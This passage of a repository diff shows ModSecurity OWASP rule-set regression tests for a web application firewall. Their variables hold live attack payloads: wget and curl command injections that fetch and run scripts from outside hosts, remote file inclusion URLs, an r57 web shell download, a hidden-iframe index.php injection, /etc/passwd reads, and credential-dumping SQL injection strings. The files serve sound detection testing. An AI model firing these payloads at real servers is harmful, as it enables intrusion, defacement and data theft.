Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Rogue web site crawler (990012)
#####################################################
%output 990012
%var ua=DataCha0s/2.0
%var ua=Morfeus Fucking Scanner
%var ua=VoidEYE
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: $ua
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%endtest

393
iis/ModSecurityIIS/owasp_crs/util/regression_tests/tests/modsecurity_crs_40_generic_attacks.tests Normal file
View File

@@ -0,0 +1,393 @@
%timeout 6
%test System Command Injection (950907)
###################################
%output 950907
%var command=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf *.txt');
%var command=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php
%request
GET /?foo=$command HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Injection of Undocumented ColdFusion Tags (950008)
###################################
%output 950008
%var cf_command=cfusion_decrypt(string%2ckey)
%var cf_command=%3CCFINTERNALDEBUG%20ACTION%3D%22pcode%22%20OUTVAR%3D%22r_var%22%20TEMPLATEPATH%3D%22%23template%23%22%3E
%request
GET /?foo=$cf_command HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test LDAP Injection Attack (950010)
###################################
%output 950010
%var ldap_command=jsmith)(|(objectclass=*)
%var ldap_command=joe)(|(password=*
%var ldap_command=(&(objectClass=*)(objectClass=resources))
%request
GET /?foo=$ldap_command HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test SSI Injection Attack (950011)
###################################
%output 950011
%var ssi_command=%3C!--%23exec%20cmd%3D%22ls%22%20--%3E
%var ssi_command=%3C!--%23include%20virtual%3D%22%2Fetc%2Fpasswd%22%20--%3E
%request
GET /?foo=$ssi_command HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Universal PDF XSS URL Detected (950018)
###################################
%output 950018
%var updf=http%3A%2F%2Fwww.example.com%2Ffile.pdf%23a%3Djavascript%3Aalert('Alert')
%request
GET /?foo=$updf HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Email Injection Attack (950019)
#####################################################
%output 950019
%request
POST / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: $CONTENT_LENGTH
body=email@anonymous.xxx%0ATo:email1@who.xxx
%test HTTP Request Smuggling Attack (950012)
###################################
%output 950012
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Transfer-Encoding: utf-8
Transfer-Encoding: utf-8
Keep-Alive: 300
Proxy-Connection: keep-alive
%test HTTP Request Smuggling (950012)
###################################
%output 950012
%request
POST / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Length: 3
Content-Length: 3
abc
%test HTTP response splitting (950910)
###################################
%output 950910
%request
GET /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html> HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.mummy.com/index.html
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test HTTP response splitting (950911)
###################################
%output 950911
%request
GET /?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.mummy.com/index.html
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Remote File Inclusion Attack (950117)
###################################
%output 950117
%request
GET /wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.mummy.com/index.html
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Remote File Inclusion Attack (950118)
###################################
%output 950118
%var rfi=/plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.luomoeillegno.com/extras/idxx.txt??
%var rfi=/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt
%var rfi=/plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.luomoeillegno.com/extras/idxx.txt
%request
GET $rfi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.mummy.com/index.html
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Remote File Inclusion Attack (950119)
###################################
%output 950119
%var rfi=/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.ezonplaza.com/img/idFARIZ.txt?
%var rfi=/bbs//skin/ggambo7002_board/write.php?dir=http://www.solmae.co.kr/upload/bbs/conf2.txt????
%var rfi=/components/com_uhp/uhp_config.php?mos/administrator/c/appserv/appserv/main.php?appserv_root=http://henry14.isfreeweb.com/zboard/id/auto1.txt????
%request
GET $rfi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.mummy.com/index.html
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Remote File Inclusion Attack (950120)
###################################
%output 950120
%var rfi=/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.ezonplaza.com/img/idFARIZ.txt??
%var rfi=/bbs//skin/ggambo7002_board/write.php?dir=http://www.solmae.co.kr/upload/bbs/conf2.txt?
%var rfi=/components/com_uhp/uhp_config.php?mos/administrator/c/appserv/appserv/main.php?appserv_root=http://henry14.isfreeweb.com/zboard/id/auto1.txt???
%request
GET $rfi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.mummy.com/index.html
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Session Fixation Attack (950009)
###################################
%output 950009
%request
GET /foo.php?bar=blah<script>document.cookie="sessionid=1234;%20domain=.example.dom";</script> HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.mummy.com/index.html
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Session Fixation Attack (950000)
###################################
%output 950000
%request
GET /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Session Fixation Attack (950003)
###################################
%output 950003
%request
GET /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-sg
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Referer: http://forum.antichat.ru/forum127.html
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Remote File Access Attempt (950005)
###################################
%output 950005
%var file=../../../../../boot.ini
%var file=/etc/passwd
%var file=../../../../../../../../../../usr/local/app/apache2/conf/httpd.conf
%request
GET /index.php?file=News&op=$file%00 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-sg
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test System Command Access (950002)
###################################
%output 950002
%var file=/d/winnt/system32/cmd.exe?/c+dir.
%request
GET /foo.aspx?$file HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-sg
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test System Command Injection (950006)
###################################
%output 950006
%var command=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf *.txt');
%var command=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php
%request
GET /?foo=$command HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test PHP Injection Attack (959151)
###################################
%output 959151
%var command=<?exec('wget%20http://r57.biz/r57.txt%20-O shell.php');?>
%var command=%3C%3Fphp%20echo(%5C%22KURWA%5C%22)%3B%20file_put_contents(%5C%22.%2Findex.php%5C%22%2C%20base64_decode(%5C%22Pz48aWZyYW1lIHNyYz0iaHR0cDovL3p1by5wb2Rnb3J6Lm9yZy96dW8vZWxlbi9pbmRleC5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT48P3BocA%3D%3D%5C%22)%2C%20FILE_APPEND)%3B%20%3F%3E
%request
GET /?foo=$command HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test PHP Injection Attack (958976)
###################################
%output 958976|958977
%var php_code=%20%20if%20(!function_exists(%22fs_copy_dir%22))%20%7B%0A%20%20%20%20function%20fs_copy_dir(%24d%2C%24t)%20%7B%0A%20%20%20%20%20%20%24d%20%3D%20str_replace(%22%5C%5C%22%2CDIRECTORY_SEPARATOR%2C%24d)%3B%0A%20%20%20%20%20%20if%20(substr(%24d%2C-1)%20!%3D%20DIRECTORY_SEPARATOR)%20%7B%24d%20.%3D%20DIRECTORY_SEPARATOR%3B%7D%0A%20%20%20%20%20%20%24h%20%3D%20opendir(%24d)%3B%0A%20%20%20%20%20%20while%20((%24o%20%3D%20readdir(%24h))%20!%3D%3D%20FALSE)%20%7B%0A%20%20%20%20%20%20%20%20if%20((%24o%20!%3D%20%22.%22)%20and%20(%24o%20!%3D%20%22..%22))%20%7B%0A%20%20%20%20%20%20%20%20%20%20if%20(!is_dir(%24d.DIRECTORY_SEPARATOR.%24o))%20%7B%24ret%20%3D%20copy(%24d.DIRECTORY_SEPARATOR.%24o%2C%24t.DIRECTORY_SEPARATOR.%24o)%3B%7D%0A%20%20%20%20%20%20%20%20%20%20else%20%7B%24ret%20%3D%20mkdir(%24t.DIRECTORY_SEPARATOR.%24o)%3B%20fs_copy_dir(%24d.DIRECTORY_SEPARATOR.%24o%2C%24t.DIRECTORY_SEPARATOR.%24o)%3B%7D%0A%20%20%20%20%20%20%20%20%20%20if%20(!%24ret)%20%7Breturn%20%24ret%3B%7D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20closedir(%24h)%3B%0A%20%20%20%20%20%20return%20TRUE%3B%0A%20%20%20%20%7D
%var php_code=echo%20sr(15%2C%22%3Cb%3E%22.%24lang%5B%24language.'_text16'%5D.%24arrow.%22%3C%2Fb%3E%22%2C%22%3Cselect%20name%3D%5C%22method%5C%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22system%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22system%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Esystem%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22passthru%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22passthru%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Epassthru%3C%2Foption%3E%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22exec%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22exec%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Eexec%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22shell_exec%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22shell_exec%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Eshell_exec%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22popen%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22popen%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Epopen%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22proc_open%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22proc_open%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Eproc_open%3C%2Foption%3E
%request
POST / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: $CONTENT_LENGTH
body=$php_code
%endtest

208
iis/ModSecurityIIS/owasp_crs/util/regression_tests/tests/modsecurity_crs_41_sql_injection_attacks.tests Normal file
View File

@@ -0,0 +1,208 @@
%timeout 10
# File 41 SQL Injection Attacks
%request
GET /?v=$sig HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.
Keep-Alive: 300
Proxy-Connection: keep-alive
%test SQL Comment Sequence Detected (981231)
########################################
%output 981231
%var sig=SELECT%2F*avoid-spaces*%2Fpassword%2F**%2FFROM%2F**%2FMembers
%var sig=%E2%80%98%20or%201%3D1%23%0A
%var sig=%E2%80%98%20or%201%3D1--%20-
%endtest
%test SQL Hex Encoding Identified (981260)
########################################
%output 981260
%var sig=1%20and%201%3D0%20%20Union%20Select%20%20%20UNHEX(HEX(concat(0x5B6B65795D%2Ctable_name%2C0x5B6B65795D)))%20%20%20FROM%20INFORMATION_SCHEMA.tables%20where%20table_schema%3DConcat(char(109)%2Cchar(101)%2Cchar(115)%2Cchar(115)%2Cchar(110)%2Cchar(101)%2Cchar(114)%2Cchar(98)%2Cchar(95)%2Cchar(119)%2Cchar(114)%2Cchar(100)%2Cchar(49)%2Cchar(50))%20LIMIT%201%2C1--
%var sig=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536--
%endtest
%test SQL Injection Attack: Common Injection Testing Detected (981318)
########################################
%output 981318
%var sig='%20and%200%20union%20select%201%2C2%2C3%2Cusername%2C5%2Cpassword%2C7%2C8%2C9%2C10%2C11%20from%20%23__users%23
%var sig=-1)%20UNION%20SELECT%201%2C2%2C3%2Cconcat(USER()%2C'
%endtest
%test SQL Injection Attack: SQL Operator Detected (981319)
########################################
%output 981319
%var sig=-4%20union%20select%201%2C2%2C(select(%40x)from(select(%40x%3A%3D0x00)%2C(select(null)from(information_schema.columns)where(table_schema!%3D0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(%40x%3A%3Dconcat(%40x%2C0x3c62723e%2Ctable_schema%2C0x2e%2Ctable_name%2C0x3a%2Ccolumn_name))))x)--
%var sig=14380586%20and%20user()%3C%3E1
%var sig=2946%20and%20ascii(substring((user())%2C1%2C1))%3E%3D1%2F*
%endtest
%test SQL Injection Attack: SQL Tautology Detected (950901)
########################################
%output 950901
%var sig=-9'%20union%20select%20concat(version())%2C2%2C3%2C4%2C5%2C6and'1'%3D'1
%var sig=1'%20or%20'1'!%3D'2%20order%20by%201--
%endtest
%test SQL Injection Attack: Common DB Names Detected (981320)
########################################
%output 981320
%var sig=3%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2Cconcat(user()%2Cversion()%2Cdatabase())%2C8%20from%20information_schema.tables
%var sig=918%20union%20select%200%2C1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%20from%20msysobjects%20in%20'.'
%endtest
%test SQL SELECT Statement Anomaly Detection Alert (981317)
########################################
%output 981317
%var sig=247'%20and%201%3D1%20union%20all%20select%201%2C2%2C3%2C4%2C5%2Cconcat(username%2Cchar(58)%2Cpasswort)%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%20from%20az_user%2F*
%var sig=5%20and%201%3D(select%20first%201%20distinct%20rdb%24relation_name%20from%20rdb%24relations%20where%20rdb%24system_flag%3D0)--
%endtest
%test Blind SQL Injection Attack (950007)
########################################
%output 950007
%var sig=-2511%20union%20select%20table_name%20from%20sys.all_tables--
%var sig=1%20union%20select%201%2Cnull%2Cnull%2Cnull%2Ctable_name%7C%7Cchr(58)%7C%7Ccolumn_name%7C%7Cchr(58)%7C%7Cdata_type%20from%20(select%20a.*%2Crownum%20rnum%20from%20(select%20*%20from%20user_tab_columns%20where%20table_name%3Dchr(76)%7C%7Cchr(79)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(83)%20order%20by%20column_name)%20a%20where%20rownum%20%3C%3D%201)%20where%20rnum%20%3E%3D%201--
%endtest
%test SQL Injection Attack (950001)
########################################
%output 950001
%var sig=10%20UNION%20exec%20master..xp_cmdshell%20'dir'
%var sig=1'%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(mid(concat_ws(0x0b%2Cversion()%2Cuser()%2Cdatabase()%2C%40%40version_compile_os%2C0x0b)%2C1%2C63)%2C%20floor(rand(0)*2)))--
%endtest
%test SQL Injection Attack (959070)
########################################
%output 959070
%var sig=-247%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2Cconcat_ws(0x3a%2Cversion()%2Cdatabase()%2CuseR())%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%0A1%20having%201%3D1--
%var sig=256%20%20AND%201%3Cascii(substring((SELECT%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name%20like%20char(105%2C109%2C103%2C101%2C115)%20limit%201%2C1)%2C1%2C1))
%endtest
%test SQL Injection Attack (959071)
########################################
%output 959071
%var sig=1'%20or%201%3D(SELECT%20TOP%201%20email%20FROM%20cdrequests%20where%20id%3D2000)--
%var sig=1'%20or%20'1'%3D'1%20order%20by%201--
%endtest
%test SQL Injection Attack (959072)
########################################
%output 959072
%var sig=99999999%20and%201%3D2%20union%20select%201%2Cconcat(user()%2Cchar(58)%2Cversion()%2Cchar(58)%2Cdatabase())%2C3%2C4%2F*
%var sig=-9'%20union%20select%20concat(version())%2C2%2C3%2C4%2C5%2C6%2Cand'1'%3D'1
%endtest
%test SQL Injection Attack (950908)
########################################
%output 950908
%var sig=6%20AND%20ASCII(SUBSTR((COALESCE(5%2C%20NULL))%2C%201%2C%201))%20%3E%2063
%endtest
%test SQL Injection Attack (959073)
########################################
%output 959073
%var sig=-120%20union%20all%20select%201%2Ccast(table_name%20as%20text)%20from%20information_schema.columns--
%var sig=-1100%20UNION%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2Cconcat_ws(0x2b%2Cversion()%2Cuser()%2C%40%40version_compile_os)%2C10%2C11%2C12%20--
%endtest
%test Detects blind sqli tests using sleep() or benchmark() (981272)
########################################
%output 981272
%var sig=-207%20union%20select%201%2Cconcat(%40i%3A%3D0x00%2C%40o%3A%3D0x0d0a%2Cbenchmark(23%2C%40o%3A%3DCONCAT(%40o%2C0x0d0a%2C(SELECT%20concat(table_schema%2C0x2E%2C%40i%3A%3Dtable_name)%20from%20information_schema.tables%20WHERE%20table_name%3E%40i%20order%20by%20table_name%20LIMIT%201)))%2C%40o)%2C3%2C4%2C5--
%var sig=13%20and%20sleep(3)%23
%endtest
%test Detects basic SQL authentication bypass attempts 1/3 (981244)
########################################
%output 981244
%var sig=aaa'%20or%20(1)%3D(1)%20%23!asd
%var sig=aa'%20LIKE%20md5(1)%20or%20'1
%endtest
%test Detects MSSQL code execution and information gathering attempts (981255)
########################################
%output 981255
%var sig='%20union%20select%20concat(UserId%2Cchar(58)%2CUserPassword)%20from%20users%20into%20outfile%20'content%2F1.php'%2F*
